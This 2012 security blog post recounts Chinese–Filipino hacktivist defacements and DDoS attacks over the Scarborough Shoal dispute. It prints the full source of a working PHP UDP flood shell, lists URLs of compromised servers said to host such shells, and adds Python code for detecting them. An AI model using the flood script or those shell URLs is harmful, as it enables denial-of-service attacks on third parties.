
Understanding the Origins of the China - Philippine Cyber War

May 3, 2012, by Jay Turla

For many years there has been a territorial dispute between China and the Philippines over the Scarborough Shoal (Philippine term: Panatag Shoal; Chinese term: Huangyan Island) and the Spratly Islands. The most contested of these today is the Scarborough Shoal, because tension has grown since the Chinese government sent a naval vessel into the South China Sea after rejecting a Philippine proposal to submit the Panatag Shoal dispute.

A few days later, defacers vandalized the official website of the University of the Philippines and left a note saying that they were from China and that Huangyan Island was theirs, not the Philippines'.

News spread about the defacement and intrusion by the hackers who claimed to be from China, and in response a hacker using the handle busabos retaliated by defacing three Chinese domains: star.chinaumu.org, v.cyol.com and ploft.cn. He also posted the websites on a Facebook fan page called Anonymous #OccupyPhilippines, which has over 1000 likes and counting. This happened on April 21, 2012.


In his defacement he said:

STFU

Chinese government is clearly retarded

Scarborough Shoal

Anonymous #OccupyPhilippines

We are Anonymous, We are legion, We don't forgive, We don't forget

United as one Divided by zero, Expect us.

He also put a logo of a figure wearing a Guy Fawkes mask and an embedded rock soundtrack on his defaced page. Judging by the wording of the defacement, he is a supporter of Anonymous.

Busabos also wrote on the Anonymous #OccupyPhilippines fan page that he would rather oppose the Chinese underground hackers in cyberspace than do nothing about their defacements while Philippine sites were being mass-defaced.

For those who do not know busabos: he was also the person behind the 2009-2010 intrusions into Philippine government websites during the pre-election period, and Zone-H holds a long list of his notifications and archived defacements.

A few minutes later, a defacer using the handle Supra Dick posted four defaced Chinese websites to the same fan page:

www.lanseyinxiang.com/phil.html

http://www.sanxinsudi.com/index.html

http://gh.rc.gov.cn

http://www.ryjzw.com


The defacement is a bit funny because the defacer misspelled the word Philippines. (lol)

My first impression of the retaliation by Pinoy (Filipino) hackers over the UP incident was that it could trigger a cyber war between the two countries.

Meanwhile, on Facebook, several images about the territorial dispute between the two countries have also become the "talk of the town".

The day after the retaliation, Malacañang Palace, the official residence and workplace of the President of the Republic of the Philippines, called for an end to the cyber-attacks against China because they could worsen the situation and the tension. Raul Hernandez, assistant secretary and spokesman of the Philippine Department of Foreign Affairs, said:

"We denounce such cyber-attacks regardless from which side they are coming from. They are counter-productive and will only add to the tensions. We call on both Filipino and Chinese netizens to be more responsible and encourage dialogue rather than discord."

However, his statement has little practical effect: the government cannot control the people behind the attacks, and the country has no cyber security, forensics or information security agency that acts in this kind of situation. The National Bureau of Investigation's Anti-Fraud and Computer Crimes Division has shown itself to be ineffective and weak in cyber forensics; I base this on my earlier interview with busabos, who leaked a chat log of a conversation he had with an NBI agent. The government of the Philippines is, however, looking to establish an agency that deals with this kind of problem.

Still, Hernandez's statement makes a valid point: China is known for state-funded cyber espionage, and the underground groups in the Philippines are growing, so the exchanges could escalate into a cyber war. He simply wants to call the attackers off, and I cannot blame him for that.

On April 23, 2012, Presidential Spokesperson Edwin Lacierda issued an official statement saying:

"At around four o'clock in the afternoon of April 23, 2012, the Presidential Communications Development and Strategic Planning Office (PCDSPO) noticed a significant spike in traffic with malicious URL requests from forged user-agents being channeled to the Official Gazette website (URL: www.gov.ph), to the PCDSPO website (URL: www.pcdspo.gov.ph), and to the Presidential Museum and Library website (URL: www.malacanang.gov.ph), causing our servers to momentarily lag. We determined that this was a denial-of-service attack. Information gathered through our data analysis indicated that the attack originated from IP addresses assigned to Chinese networks.

The PCDSPO is endeavoring to maintain its websites. However, please note that we can expect temporary disruption of service while the attack is ongoing."

Was this really a DDoS attack from China, or were only the servers used located in China while the real perpetrators were not Chinese at all? Would attackers really want to launch an attack that could be traced back to China? The official showed no logs, perhaps for reasons of confidentiality.

I cannot say that these attacks came from the Chinese, because the spokesperson provided no sufficient evidence and because who would want to be traced back to IP addresses in their own country? But that is just my view. Anyone serious about cyber espionage would launch a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack from a different network.
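Reading the PCDSPO statement as a responder, the three things to check in the logs are the request spike from a small set of sources, the junk URLs and forged User-Agent strings, and the registration of those source addresses. The following is an added example, not code from the article or from the PCDSPO, of triaging those three points from ordinary web-server access logs. The log lines, the prefix table and the network labels are constructed for the example (RFC 5737 documentation ranges stand in for real allocations); in practice the table would come from RIR delegation data or a GeoIP database.

```python
"""Triage of an HTTP request flood from web-server access logs.

Added example, not code from the article or from the PCDSPO.  Parses
combined-format access log lines, flags sources that send mostly failing
requests at volume, checks whether they share one User-Agent string, and
maps each source to the network it is registered in.  Log lines, prefix
table and labels are constructed; RFC 5737 ranges stand in for real space.
"""
import ipaddress
import re
from collections import Counter, defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed registration table.  In practice: RIR delegated-extended files
# or a GeoIP database.  Both labels are fictional.
PREFIX_TABLE = {
    ipaddress.ip_network("203.0.113.0/24"): "AS-EXAMPLE-1 (registered: country X)",
    ipaddress.ip_network("198.51.100.0/24"): "AS-EXAMPLE-2 (registered: country Y)",
}

# Constructed sample: two sources hit nonexistent paths with one bare
# User-Agent string; the third is an ordinary visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Apr/2012:16:00:01 +0800] "GET /index.php?id=1%27 HTTP/1.1" 404 209 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Apr/2012:16:00:01 +0800] "GET /admin.php HTTP/1.1" 404 209 "-" "Mozilla/4.0"
203.0.113.7 - - [23/Apr/2012:16:00:01 +0800] "GET /x.php HTTP/1.1" 404 209 "-" "Mozilla/4.0"
203.0.113.9 - - [23/Apr/2012:16:00:02 +0800] "GET /index.php?id=1%27 HTTP/1.1" 404 209 "-" "Mozilla/4.0"
203.0.113.9 - - [23/Apr/2012:16:00:02 +0800] "GET /y.php HTTP/1.1" 404 209 "-" "Mozilla/4.0"
203.0.113.9 - - [23/Apr/2012:16:00:02 +0800] "GET /z.php HTTP/1.1" 404 209 "-" "Mozilla/4.0"
198.51.100.5 - - [23/Apr/2012:16:00:02 +0800] "GET /2012/04/23/statement/ HTTP/1.1" 200 18211 "-" "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0"
"""


def parse_log(text):
    """One dict per parseable line; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            entry = m.groupdict()
            entry["status"] = int(entry["status"])
            entries.append(entry)
    return entries


def registered_network(ip, table=PREFIX_TABLE):
    """Longest-prefix match of ip against the table, or None."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, label in table.items():
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, label)
    return best[1] if best else None


def flag_flood_sources(entries, min_requests=3, min_error_ratio=0.5):
    """Sources sending at least min_requests of which most fail (4xx/5xx):
    the 'malicious URL requests' pattern the statement describes.  The
    User-Agent header is client-supplied, so it is recorded, not trusted."""
    per_ip = defaultdict(list)
    for e in entries:
        per_ip[e["ip"]].append(e)
    flagged = []
    for ip, reqs in per_ip.items():
        errors = sum(1 for r in reqs if r["status"] >= 400)
        if len(reqs) >= min_requests and errors / len(reqs) >= min_error_ratio:
            flagged.append({
                "ip": ip,
                "requests": len(reqs),
                "error_ratio": errors / len(reqs),
                "user_agents": Counter(r["ua"] for r in reqs),
                "registered": registered_network(ip),
            })
    return sorted(flagged, key=lambda f: -f["requests"])


def shared_user_agent(flagged):
    """The single User-Agent string every flagged source used (one tool
    behind many addresses), or None when they differ."""
    if not flagged:
        return None
    common = set(flagged[0]["user_agents"])
    for f in flagged[1:]:
        common &= set(f["user_agents"])
    return next(iter(common)) if len(common) == 1 else None


if __name__ == "__main__":
    hits = flag_flood_sources(parse_log(SAMPLE_LOG))
    for h in hits:
        print(f'{h["ip"]:15} {h["requests"]:3d} requests  {h["error_ratio"]:.0%} failed  '
              f'{h["registered"]}')
    print("shared User-Agent:", shared_user_agent(hits))
```

The last column is the weakest link in the chain: it says which organisation a prefix is registered to, not who controlled the host at the time. An HTTP request flood runs over TCP, so the logged source addresses completed a handshake and are real senders, but a real sender can be a compromised server, an open proxy or a rented machine anywhere. That is the gap between "IP addresses assigned to Chinese networks" and "Chinese attackers".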

After the news spread again, Privatex, another underground group in the Philippines, decided to join the Anonymous #OccupyPhilippines group, and together they launched a second retaliation, which they called #OpChinaDown. Below are the websites they confirmed compromising:

http://www.ocex.com.cn

http://www.teawindow.com

http://www.higvod.cn

http://www.lzrk.gov.cn

http://lppm.bigc.edu.cn/Pr1vX.htm

http://xxb.leiyang.gov.cn/Pr1vX.htm

http://en.founder.com.cn

http://dxswl.cn

http://www.cord.cn

http://fmprc.gov.cn (DDoS or DoS attack)

http://www.3322.net.cn

http://wahsangtech.com/index.aspx


The two newly allied groups issued an official statement on Pastebin:

#OpChinaDown

The recent defacements occurred on certain Chinese websites are just simple responses to what happened to the UP site. You may continue to bully our country's waters but we will not tolerate you from intimidating our own cyber shores.

Those defacements are just mere echoes to what you have initially started. We are not trying to start anything. We are just trying to tell you that we do not want to be bullied in our own cyberspace too.

#OpChinaDown is not a threat. It will be a reply. A reply to future attacks within our cyberspace. We will leave our country's disputes to our government's hands. Yet this does not mean we will not support them.

Scarborough Shoal is ours.

We are Anonymous

We are Legion

We do not Forgive

We do not Forget

United as One

Divided by Zero

Expect Us

@AnonPinas

Aside from defacing Chinese websites, supporters of the two groups also launched DDoS and DoS attacks against Chinese domains and government websites. In fact, seethered of Anonymous #OccupyPhilippines posted fifteen PHP UDP flood shells that he had uploaded to fifteen websites he had gained access to. Below are the sites he posted, each hosting a UDP flood shell:

http://spaneconi.com.mx/upd.php

http://haventheatre.org/upd.php

http://ainamedia.com/upd.php

http://210.127.51.207/upd.php

http://www.courseoutsource.com/upd.php

http://www.tagsystems.org/upd.php

http://cyberretailer.biz/upd.php

http://www.thebirchproductions.com/upd.php

http://minstermemorialsltd.co.uk/upd.php

http://202.200.82.44/webdav/shell.php

http://217.6.136.144/webdav/greenshell.php

http://www.tingsbling.co.uk/upd.php

http://ipswichinflatables.co.uk/upd.php

http://inspireyogabrisbane.com.au/wp-content/themes/striking/cache/images/udp.php

http://www.cutbackprod.com/wp-content/themes/aperture/cache/adik.php

Based on my analysis, seethered uploaded a PHP UDP flood script known to have been originally coded by Hexbooter. I obtained a copy of the same script from a site I was cleaning of backdoor shells (not one of the sites seethered posted, of course). Here is the code of the malicious PHP file:

[sourcecode]
<?php
//UDP
// The flood only runs when the attacker supplies a target and a duration
// in the query string, e.g. upd.php?host=<target>&time=<seconds>.
if(isset($_GET['host'])&&isset($_GET['time'])){
    $packets = 0;
    ignore_user_abort(TRUE);   // keep flooding after the attacker's browser disconnects
    set_time_limit(0);         // remove PHP's maximum execution time
    $exec_time = $_GET['time'];
    $time = time();
    //print "Started: ".time('d-m-y h:i:s')."\n";
    $max_time = $time+$exec_time;
    $host = $_GET['host'];
    $out = '';                 // 65,000-byte payload of 'X' sent in every datagram
    for($i=0;$i<65000;$i++){
        $out .= 'X';
    }
    while(1){
        $packets++;
        if(time() > $max_time){
            break;
        }
        $rand = rand(1,65000);   // a new random destination port for each datagram
        $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
        if($fp){
            fwrite($fp, $out);
            fclose($fp);
        }
    }
    echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
    if(!isset($surl)){ $surl = '?'; }  // $surl is never defined in this fragment; fall back to the current URL
    echo '<br><br>
    <form action="'.$surl.'" method=GET>
    <input type="hidden" name="act" value="phptools">
    IP: <br><input type=text name=host><br>
    Length (seconds): <br><input type=text name=time><br>
    <input type="submit" value="Go" /></form>';
}else{ echo '<br><b>UDP Flood</b><br>
    <form action=? method=GET>
    <input type="hidden" name="act" value="phptools">
    IP: <br><input type=text name=host value=><br>
    Length (seconds): <br><input type=text name=time value=><br><br>
    <input type=submit value=Go></form>';
}
?>
[/sourcecode]

The script does not send a fixed 65,000 packets per second. It builds a single 65,000-byte payload (the character 'X' repeated 65,000 times) and then, for as many seconds as the attacker passes in the time parameter, loops as fast as the host allows, sending that payload to a random UDP port between 1 and 65000 on the target each time. Because 65,000 bytes is far larger than any normal link MTU, every datagram is split into many IP fragments on the wire, so the victim pays for reassembly as well as bandwidth. ignore_user_abort(TRUE) and set_time_limit(0) keep the loop running after the attacker closes the browser, so one GET request with a host and a duration turns the compromised web server into a flood source for as long as requested, and the fifteen copies listed above can be driven in parallel from the same form, which is what makes the attack distributed.
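For whoever has to clean one of the fifteen hosts above, the useful artefacts are the script's own tell-tale calls and the requests that drove it. The following is an added example, not code from the article or from the shell's author, of checking both from a compromised web host: a source scanner that keys on the combination of a UDP fsockopen, attacker-supplied host and time parameters and the calls that keep the loop alive, plus an access-log parser that pulls out the GET requests carrying both host= and time=, which also reveals who the flood was aimed at and for how long. The PHP snippets and log lines are constructed for the example; the directory heuristic (cache, uploads, images, webdav) reflects the paths in the list above.

```python
"""Finding the PHP UDP-flood shell on a compromised web host.

Added example, not code from the article or from the shell's author.
Two checks: a source scanner for PHP files and an access-log parser for the
requests that invoked the shell.  All samples below are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Each indicator alone is legitimate in plenty of PHP; the combination is not.
INDICATORS = {
    "udp_socket":    re.compile(r"fsockopen\(\s*['\"]udp://", re.I),
    "host_from_get": re.compile(r"\$_(?:GET|POST|REQUEST)\[\s*['\"]host['\"]\s*\]"),
    "time_from_get": re.compile(r"\$_(?:GET|POST|REQUEST)\[\s*['\"]time['\"]\s*\]"),
    "no_time_limit": re.compile(r"set_time_limit\(\s*0\s*\)"),
    "ignore_abort":  re.compile(r"ignore_user_abort\(\s*(?:true|1)\s*\)", re.I),
    "random_port":   re.compile(r"rand\(\s*1\s*,\s*65000\s*\)"),
}

# Directories that should never hold executable PHP but did in the list above.
SUSPICIOUS_LOCATION_RE = re.compile(r"/(?:cache|uploads|images|webdav|tmp)/[^/]+\.php$", re.I)

# One request line of an Apache/nginx combined log; only source IP and URL matter here.
LOG_REQ_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+"')


def match_indicators(php_source):
    """Names of the indicators present in a PHP file's source, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(php_source))


def is_udp_flood_shell(php_source):
    """True when the UDP socket, both attacker-controlled parameters and at
    least one keep-running call are all present."""
    hits = set(match_indicators(php_source))
    return ("udp_socket" in hits
            and {"host_from_get", "time_from_get"} <= hits
            and bool(hits & {"no_time_limit", "ignore_abort"}))


def in_suspicious_location(url_path):
    """PHP living under a cache/upload/WebDAV directory deserves a look."""
    return bool(SUSPICIOUS_LOCATION_RE.search(url_path))


def find_flood_invocations(log_text):
    """(source_ip, script_path, flood_target, seconds) for every request that
    passes both host= and time= to a .php file; seconds is None if non-numeric."""
    found = []
    for line in log_text.splitlines():
        m = LOG_REQ_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("url"))
        qs = parse_qs(url.query)
        if url.path.endswith(".php") and "host" in qs and "time" in qs:
            secs = qs["time"][0]
            found.append((m.group("ip"), url.path, qs["host"][0],
                          int(secs) if secs.isdigit() else None))
    return found


# Constructed sample: the flood script reduced to the lines a scanner keys on.
FLOOD_SAMPLE = r"""<?php
if(isset($_GET['host'])&&isset($_GET['time'])){
  ignore_user_abort(TRUE); set_time_limit(0);
  $max = time()+$_GET['time']; $out = str_repeat('X', 65000);
  while(time() < $max){
    $fp = fsockopen('udp://'.$_GET['host'], rand(1,65000), $e, $s, 5);
    if($fp){ fwrite($fp, $out); fclose($fp); }
  }
}
"""

# Constructed sample: a mailer that also opens a socket to a user-supplied host.
BENIGN_SAMPLE = r"""<?php
$fp = fsockopen('tcp://'.$_GET['host'], 25, $errno, $errstr, 5);
fwrite($fp, "EHLO example.test\r\n"); fclose($fp);
"""

# Constructed access-log lines: two shell invocations and one ordinary page view.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Apr/2012:10:15:02 +0800] "GET /wp-content/themes/striking/cache/images/udp.php?host=198.51.100.20&time=600 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Apr/2012:10:15:03 +0800] "GET /webdav/shell.php?host=198.51.100.20&time=600 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.5 - - [24/Apr/2012:10:15:04 +0800] "GET /index.php?page=about HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for label, src in (("flood", FLOOD_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(f"{label:7} shell={is_udp_flood_shell(src)} indicators={match_indicators(src)}")
    for ip, path, target, secs in find_flood_invocations(SAMPLE_LOG):
        print(f"{ip} drove {path} against {target} for {secs}s"
              f"{' (suspicious location)' if in_suspicious_location(path) else ''}")
```

The log check is the more valuable of the two on a real incident: the host= value names the victim, the source IP names whoever drove the shell (or the proxy they used), and the timestamp and time= value bound the window in which the server was attacking someone else, which is what the abuse desk and the victim will ask for.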

"They want Distributed Denial Of Service let's give them DDOS", added one of the administrators of the Anonymous #OccupyPhilippines in their Facebook Fan Page.

And as predicted, Chinese hackers claiming to be members of the Silic Group Hacker Army penetrated the official website of the Department of Budget and Management (DBM) of the Philippines. The hackers left a note saying:

"Hacked! Owned by Chinese Hackers!"

"How come a small bitch border country are overconfident? And challenged to our Chinese super hacker?"

"Remeber: Don't Trouble Chinese, Don't Play with Fire. All Members from Silic Group Hacker Army F*ck your mother and all your F8cking families"

They also included their official flag as the banner of the deface page.

For now, these are the tensions that have escalated in cyberspace. Although this cyber war between Filipinos (Pinoys) and Chinese is not as deadly as a real war, it could still hurt banks, telecommunications companies, online businesses and other e-commerce websites if these cyber warriors do not stop.

References:

https://www.facebook.com/pages/Anonymous-OccupyPhilippines/224402790971504

http://globalnation.inquirer.net/34021/china-deploys-gunboat

http://www.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the-denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/

http://www.interaksyon.com/infotech/budget-office-website-defaced-by-suspected-chinese-hackers

Additional Reading:

http://en.wikipedia.org/wiki/Scarborough_Shoal

Jay Turla

Jay Turla is a security consultant. He is interested in Linux, OpenVMS, penetration testing, tools development and vulnerability assessment. He is one of the goons of ROOTCON (Philippine Hackers Conference). You can follow his tweets @shipcod3.